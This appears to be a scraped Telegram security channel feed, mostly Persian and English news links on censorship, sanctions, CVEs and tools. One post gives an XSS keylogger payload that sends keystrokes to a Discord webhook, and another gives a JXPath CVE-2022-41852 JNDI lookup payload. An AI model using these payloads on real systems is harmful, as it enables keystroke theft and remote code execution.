Security Analysis
@securation
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
About
Blog
Apps
Platform
Join
Security Analysis
11.5K subscribers
Security Analysis
⭕️ اون زمانی که تهدید شدیم به اینکه :
اکانت ها و VPS های فیلترشکن هاتون رو کجای خونتون قایم کردی؟!
گفتیم توی CD/DVD بود شکستیم.

البته امروزه فیلترشکن که دیگه عادی تره تازه !
یه زمانی میومدن تهدید میکردن که هرکسی از پروتکل SSL برای سایت ها استفاده کنه مجرم هست.
میگفتیم مشکلش چیه وقتی داریم امنیت سرویس رو بالا میبریم؟
میگفتن :
ما نمیدونیم این پروتکل چیه ، ولی دشمن اینو طراحی کرده که اطلاعات رمزنگاری شده رد و بدل بشن!

بقیه اش خودتون متوجه شدین قطعا :)

@securation
👍61😁15👎3😢31🤩1
3K viewsAdel
Security Analysis
⭕️ طبق گفته ی خبرگزاری CNN ، بایدن به آقا ایلان گفته که ازت حمایت میکنیم بابت اینترنت ماهواره ای که به مردم شریف ایران میدید.
گفته هزینه های این کار رو برای مردم کاهش میده و هرگونه حمایت نیاز باشه انجام میدیم.
حالا فعلا مشخص نیست چطور اینکارو میکنه و هزینه ها رو چطوری میخواد کاهش بده ، ولی خب نابغه ی مغروری مثل ایلان ماسک قطعا قدرت خودش رو به رخ استاد روح الله مومن نسب و تمام مُریدانِ این طرح امنیتی #صیانت و تمام خاک خورده های قرن دوم میلادی نشون میده.
https://edition.cnn.com/2022/10/21/politics/white-house-musk-starlink-iran-protests-ukraine/index.html

#صیانت #ایلان_ماسک
@securation
CNN
CNN Exclusive: After Ukraine, Biden administration turns to Musk’s satellite internet for Iran | CNN Politics
The White House has engaged in talks with Elon Musk about the possibility of setting up SpaceX’s satellite internet service Starlink inside Iran, multiple officials familiar with the discussions told CNN.
👍28👎104🤩2😁1
3.09K viewsAdel
Security Analysis
⭕️Apache Commons Jxpath (CVE-2022-41852)

Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC:
https://github.com/Warxim/CVE-2022-41852

Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

#apache #jxpath #exploit
@securation
👍4
3.8K viewsAdel, edited  
Security Analysis
https://twitter.com/shokrani_maryam/status/1584805973381697537?t=skNri-pOi4dDdMwHDvoM-g&s=35
14👎9👍6😢2😁1
3.86K viewsAdel
Security Analysis
UAC bypass for x64 Windows 7 - 11
🔥13😱3👎2👍1
3.98K views
Security Analysis
⭕️ Triggering RCE in the Samsung Galaxy phones via Galaxy Store Vulnerability

آسیب پذیری پیدا شده در Galaxy Store اجازه RCE توسط حمله کننده در تلفن همراه را می دهد.
این آسیب پذیری از طریق deeplink هندل شده نا امن رخ می دهد که به موجب آن حمله کننده قادر به اجرای کد JS در webview می شود. deeplink ها می توانند توسط اپلیکیشن های دیگر یا مرورگر فراخوانی شوند. Galaxy Store نیز هنگام دریافت deeplink مرتبط با خودش //:samsungapps آن را پردازش و از طریق webview نمایش می دهد.

https://ssd-disclosure.com/ssd-advisory-galaxy-store-applications-installation-launching-without-user-interaction/
#galaxy #store #rce
@securation
SSD Secure Disclosure
SSD Advisory – Galaxy Store Applications Installation/Launching without User Interaction - SSD Secure Disclosure
A vulnerability in the Galaxy Store allows attackers through an XSS to cause the store to install and/or launch an application, allowing remote attackers to trigger a remote command execution in the phone.
👍17
3.62K views
Security Analysis
⭕️ شرکت آروان کلود و پرس تی وی در لیست تحریم های اروپا قرار گرفتند.
لیست و جزییات کامل :

https://eur-lex.europa.eu/legal-content/EN/TXT/PDF/?uri=OJ:L:2022:293I:FULL&from=EN

@securation
👍30🎉11👎7
3.95K viewsedited  
Security Analysis
بازگشت ترامپ به توئیتر:

https://twitter.com/realdonaldtrump
X (formerly Twitter)
Donald J. Trump (@realDonaldTrump) on X
45th & 47th President of the United States of America🇺🇸
👍33👎11🎉8😱21🔥1
2.76K views
Security Analysis
https://www.cci-es.org/en/cybersecurity-attacks-on-critical-infrastructure/
Centro de Ciberseguridad Industrial
Cybersecurity Attacks on Critical Infrastructure - Centro de Ciberseguridad Industrial
A cyber-attack on any of these critical infrastructures may result in failure or disruption of their operation.
👍7
3.01K views
Security Analysis
⭕️ Malware Analysis Series

Link : pdf
#Malware
@securation
3.86K viewsedited  
Security Analysis
⭕️Advanced Github OSINT Framework

https://github.com/bellingcat/octosuite
#osint #tool
@securation
👍12
4.12K viewsedited  
Security Analysis
⭕️ناتو⁩ خود را برای یک "جنگ سایبری" آماده می‌کند.
‏حدود 150 کارشناس امنیت سایبری ناتو این هفته در استونی گردهم آمدند تا برای شبیه‌سازی مقابله با یک جنگ سایبری تمام عیار آماده شوند

https://www.politico.com/news/2022/12/03/nato-future-cyber-war-00072060
#cyberwar
@securation
🤩39😁6👍5😱5
2.96K viewsedited  
Security Analysis
⭕️ درحالی که توی کانادا مسابقات Pwn2Own 2022 در حال امادگی و برگزاری هست ، اینجا توی ایران یک مشت گاو نشستن روی کابل اینترنت فقط دنبال فیلتر کردن و قطع کانکشن های ارتباطی هستن.


https://www.zerodayinitiative.com/blog/2022/12/5/pwn2own-toronto-2022-the-schedule #pwn #pwn2own
@securation
Zero Day Initiative
Zero Day Initiative — Pwn2Own Toronto 2022 - The Schedule
Welcome to Pwn2Own Toronto 2022! his year marks the 10th anniversary of our consumer-focused version of the contest, and we plan on celebrating by putting some amazing research on display. For this year’s event, we have 26 contestants and teams attempting…
😢35👍9😁2👎1🤩1
2.66K views
Security Analysis
https://github.com/projectdiscovery/nuclei/releases/tag/v2.8.2
GitHub
Release v2.8.2 · projectdiscovery/nuclei
What's Changed

Fixed issue with printing host instead of ip by @tarunKoyalwar in #3002
Fixed nil crash with input URL edge case by @tarunKoyalwar in #3004

New Contributors

@JaneX8 made their...
5🔥1
3.85K views
Security Analysis
Exclusive: ChatGPT owner OpenAI projects $1 billion in revenue by 2024
https://www.reuters.com/business/chatgpt-owner-openai-projects-1-billion-revenue-by-2024-sources-2022-12-15/
Reuters
Exclusive: ChatGPT owner OpenAI projects $1 billion in revenue by 2024
The forecast represents how some are betting the AI tech will go far beyond splashy and sometimes flawed public demos.
👍6🔥1
3.78K views
Security Analysis
https://www.bleepingcomputer.com/news/security/google-introduces-end-to-end-encryption-for-gmail-on-the-web/
BleepingComputer
Google introduces end-to-end encryption for Gmail on the web
Google announced on Friday that it's adding end-to-end encryption to Gmail on the web, allowing enrolled Google Workspace users to send and receive encrypted emails within their domain and outside their domain. 
👍4👎1😁1
3.13K views
Security Analysis
⭕️ نامردا رفتن به اسم من یه بدافزار موبایلی نوشتن که تارگت هاش حسابهای بانکی افراد هست:(
گادفادر واقعی از این کارها نمیکنه

https://blog.cyble.com/2022/12/20/godfather-malware-returns-targeting-banking-users/

#godfather #malware
@securation
Cyble
Godfather Malware Returns: Targeting Banking Users And Online Security
The Godfather malware is back, specifically targeting banking users. Learn how this threat works and what steps you can take to protect your online banking security.
😁32👎8😢4👍3😱2
3.51K viewsedited  
Security Analysis
⭕️XSS Payload
Discord Keylogger
usage:
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>

#discord #xss #bugbounty
@securation
🔥20👎2👍1
4.18K viewsedited  
Security Analysis
ASIS CTF Finals 2022 (1725)
Jeopardy
Fri, December 30, 2022 14:30 UTC+00:00
Weight: 98 points
Duration: 1 day
ctftime.org
ASIS CTF Finals 2022
ASIS CTF Finals 2022 CTF event
🔥13👎3😢1
3.13K views
Security Analysis
Google Releases Open-Source Vulnerability Scanning Tool
https://www.infoq.com/news/2022/12/google-osv-scanner/
InfoQ
Google Releases Open-Source Vulnerability Scanning Tool
Google has released OSV-Scanner, an open-source front-end interface to the Open Source Vulnerability (OSV) database. The OSV database is a distributed, open-source database that stores vulnerability information in the OSV format. The OSV-Scanner assesses…
😢6👍1
3.09K views